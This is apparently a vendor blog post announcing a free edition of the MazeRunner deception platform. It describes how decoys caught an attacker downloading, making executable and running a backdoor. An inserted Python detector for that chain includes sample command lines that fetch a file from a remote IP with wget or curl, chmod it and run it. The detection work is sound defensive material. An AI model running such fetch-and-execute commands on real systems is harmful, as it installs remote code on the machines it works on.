The power of deception technology as an extremely viable solution to the most advanced cyber threats is unquestionable (to us at Cymmetria, at least). We are also huge supporters of the cybersecurity community that we call home and believe strongly in giving back to that community. This is why we are excited to raise the curtain on our solution and provide free access to those looking to explore its benefits. The MazeRunner Community Edition (the same one that caught the Patchwork APT, as detailed in our report last week) is now available for free to anyone wishing to use it for personal research.
Deception technology is quickly gaining in popularity due to the increasing need for an effective solution to stop and deter threat actors. MazeRunner leverages virtualization technology to automate the creation and management of deception campaigns, ultimately creating unfriendly environments for attackers. Running tools or exploits on the wrong target means the end of the attack as attackers are fingerprinted and signatures of their attack are generated and distributed throughout the organization.
Defender screen - showing how a breadcrumb is created. This will be placed on an endpoint as bait for an attacker in his reconnaissance phase.
Attacker screen - showing the same breadcrumb as seen by the attacker running a data gathering tool on a compromised machine. Note that at the bottom he steals the credentials planted by Cymmetria.
MazeRunner helps enterprises and cybersecurity teams defend valuable organizational assets from ever-changing cyber threats. MazeRunner addresses the need to quickly identify and stop advanced threat actors from operating inside the organizational perimeter, regardless of whether the attacker is lying dormant and gathering information, or actively performing lateral movement.
Deception dashboard - showing how an attacker penetrated the executive team, moved onto HR services and towards a file server.
The deception dashboard also reflects the deception campaign, a story crafted to target advanced attackers. It shows management workstations, development servers and HR workstations. These serve as the entrance point for the attacker to harvest credentials and other information that will lead him to decoys.
Code execution - showing the information gathered by the decoy (or honeypot) while an attacker was working on it after following a breadcrumb. It shows (from bottom towards the top):
Bottom command: the attacker runs wget, a command that lets him download an external file to the compromised server.
Middle command: takes the downloaded file and changes it to be executable.
Top command: runs the downloaded backdoor.
Chronological view of the attack from the previous screenshot.
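The download, make-executable, run sequence described above can also be matched in recorded command lines. The following is an added illustration, not MazeRunner or Cymmetria code; the record format, sample events and function names are assumptions, and it also covers curl and octal modes, which the screenshot does not show.

```python
import posixpath
import re
import shlex
from urllib.parse import urlparse

EVENTS = [  # constructed sample: (seconds into session, session id, command line)
    (0, "s1", "wget http://198.51.100.7/files/update.bin"),
    (4, "s1", "chmod +x update.bin"),
    (9, "s1", "./update.bin"),
    (2, "s2", "wget -O /tmp/report.pdf http://198.51.100.7/report.pdf"),
    (5, "s2", "chmod 644 /tmp/report.pdf"),
    (1, "s3", "curl -o /tmp/a http://198.51.100.7/a"),
    (3, "s3", "chmod 755 /tmp/a"),
    (6, "s3", "/tmp/a --daemon"),
]
norm = posixpath.normpath  # "./x" and "x" compare equal; cwd is not tracked

def downloaded_path(argv):
    """Return the file a wget/curl command writes, or None if it writes none."""
    flag = {"wget": "-O", "curl": "-o"}.get(argv[0])  # option naming the output file
    if flag and flag in argv[1:-1]:
        return norm(argv[argv.index(flag) + 1])
    urls = [a for a in argv[1:] if "://" in a]
    name = posixpath.basename(urlparse(urls[0]).path) if urls else ""
    return norm(name) if argv[0] == "wget" and name else None  # curl: stdout

def adds_exec(mode):
    """True if a chmod mode (octal or symbolic) sets an execute bit."""
    if re.fullmatch(r"[0-7]{3,4}", mode):
        return any(int(d, 8) & 1 for d in mode[-3:])
    return re.search(r"[+=][a-zA-Z]*x", mode) is not None

def find_chains(events):
    """Return (session, path, [t_download, t_chmod, t_exec]) for each full chain."""
    stage, hits = {}, []  # stage: (session, path) -> timestamps seen so far
    for ts, sid, line in sorted(events):
        argv = shlex.split(line)
        if not argv:
            continue
        path, cmd = downloaded_path(argv), norm(argv[0])
        if path:
            stage[(sid, path)] = [ts]                    # step 1: file fetched
        elif argv[0] == "chmod" and len(argv) >= 3 and adds_exec(argv[1]):
            for target in map(norm, argv[2:]):
                if len(stage.get((sid, target), [])) == 1:
                    stage[(sid, target)].append(ts)      # step 2: made executable
        elif len(stage.get((sid, cmd), [])) == 2:
            hits.append((sid, cmd, stage.pop((sid, cmd)) + [ts]))  # step 3: run
    return hits
```

Session s2 downloads a file but never makes it executable, so it produces no hit; a file referenced once by relative and once by absolute path is also missed because the working directory is not tracked.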
The new community edition of MazeRunner will be publicly available for private initiatives and research endeavors at no cost or commitment to purchase. The platform is fully customizable and integrates seamlessly with existing IT and security tools, allowing users to implement deception elements across the network. It is flexible and does not burden existing organizational systems, nor does it require a lot of human capital to operate.
We truly hope you enjoy the platform and please do give us your feedback.